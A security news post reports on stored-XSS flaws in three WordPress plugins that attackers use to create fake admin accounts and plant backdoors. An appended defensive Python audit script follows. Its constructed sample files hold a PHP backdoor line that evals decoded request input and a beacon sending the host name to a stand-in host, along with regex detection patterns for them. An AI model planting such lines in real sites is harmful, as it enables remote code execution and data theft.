Fake Admins and Cross-site Scripting: Hackers Take WordPress Sites by Storm

Tomcat

Cybercriminals are mass-injecting backdoors into plugin and theme files.

Cybersecurity researchers have warned that several serious vulnerabilities in WordPress plugins are being actively exploited by attackers to create fake admin accounts.

"These vulnerabilities are found in various WordPress plugins and are susceptible to unauthenticated stored cross-site scripting (XSS) attacks due to insufficient input sanitization and output escaping, which allows attackers to inject malicious scripts," researchers at Fastly reported.

The vulnerabilities under attack are listed below:
  • CVE-2023-6961 (CVSS score: 7.2) - unauthenticated stored XSS in WP Meta SEO versions prior to 4.5.12.
  • CVE-2023-40000 (CVSS score: 8.3) - unauthenticated stored XSS in LiteSpeed Cache versions prior to 5.7.
  • CVE-2024-2194 (CVSS score: 7.2) - unauthenticated stored XSS in WP Statistics versions prior to 14.5.

Attack chains that exploit these vulnerabilities include embedding a payload pointing to an encrypted JavaScript file hosted on an external domain. This file creates a new administrator account, inserts a backdoor, and installs tracking scripts.

The PHP backdoors are embedded in both plugin files and theme files, while the tracking script sends an HTTP GET request carrying host information to a remote server.

WPScan, a WordPress security company, had previously disclosed similar attacks exploiting CVE-2023-40000 to create fake admin accounts on vulnerable sites.

To reduce the risk of such attacks, WordPress site owners are advised to review their installed plugins, update them to the latest versions, and audit their sites for malware and unexpected administrator accounts.
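As an added example that is not part of the post, a small Python audit applying the advice above to constructed data: it flags administrator accounts that are unexpected or newly registered, and scans plugin and theme file contents for a few assumed indicators of injected PHP (eval of a decoded blob, eval of request input, and a host-name beacon like the tracking script described). The user rows, file paths and file contents are constructed, and the indicator patterns are heuristics of my own, not taken from the report.

```python
import re
from datetime import datetime, timedelta
# Constructed sample of wp_users rows joined with each user's wp_capabilities
# meta value (a PHP-serialized role array in real WordPress).
USERS = [
    {"login": "site_owner", "registered": "2021-06-14 09:00:00", "caps": 'a:1:{s:13:"administrator";b:1;}'},
    {"login": "editor_jane", "registered": "2023-02-01 11:30:00", "caps": 'a:1:{s:6:"editor";b:1;}'},
    {"login": "wp-support", "registered": "2024-05-28 03:12:45", "caps": 'a:1:{s:13:"administrator";b:1;}'},
]
KNOWN_ADMINS = {"site_owner"}  # administrators the site owner expects to exist
# Constructed plugin/theme file contents under hypothetical paths.
FILES = {
    "wp-content/plugins/example-plugin/example.php":
        "<?php\nfunction example_init() { return true; }\n",
    "wp-content/themes/example-theme/functions.php":
        "<?php\nadd_action('init', 'example_setup');\neval(base64_decode($_REQUEST['c']));\n",
    "wp-content/plugins/example-plugin/tracker.php":
        "<?php\nfile_get_contents('https://tracker.invalid/?h=' . $_SERVER['HTTP_HOST']);\n",
}

# Heuristic indicators (assumed, not taken from the report) for injected PHP:
# eval of a decoded blob, eval of request input, and a beacon leaking the host name.
BACKDOOR_PATTERNS = {
    "eval-of-decoded-payload": r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(",
    "eval-of-request-input": r"\beval\s*\([^)]*\$_(GET|POST|REQUEST|COOKIE)\b",
    "host-beacon": r"\b(file_get_contents|curl_setopt|wp_remote_get)\s*\([^;]*HTTP_HOST",
}

def is_administrator(caps):
    # The serialized role array carries the quoted role name as a key.
    return 's:13:"administrator";b:1;' in caps

def suspicious_admins(users, known_admins, now=None, window_days=30):
    """Administrators that are unexpected or were registered within the window."""
    cutoff = (now or datetime.now()) - timedelta(days=window_days)
    flagged = []
    for u in users:
        if not is_administrator(u["caps"]):
            continue
        registered = datetime.strptime(u["registered"], "%Y-%m-%d %H:%M:%S")
        if u["login"] not in known_admins or registered >= cutoff:
            flagged.append(u["login"])
    return flagged

def flag_files(files):
    """Map each file path to the sorted indicator names matching its content."""
    hits = {p: sorted(t for t, r in BACKDOOR_PATTERNS.items() if re.search(r, c)) for p, c in files.items()}
    return {p: tags for p, tags in hits.items() if tags}
```

Point the same two functions at a real export of wp_users/wp_usermeta and a walk of wp-content to get a first triage list; the patterns will miss anything that does not use these constructs, so treat a clean result as a starting point, not a verdict.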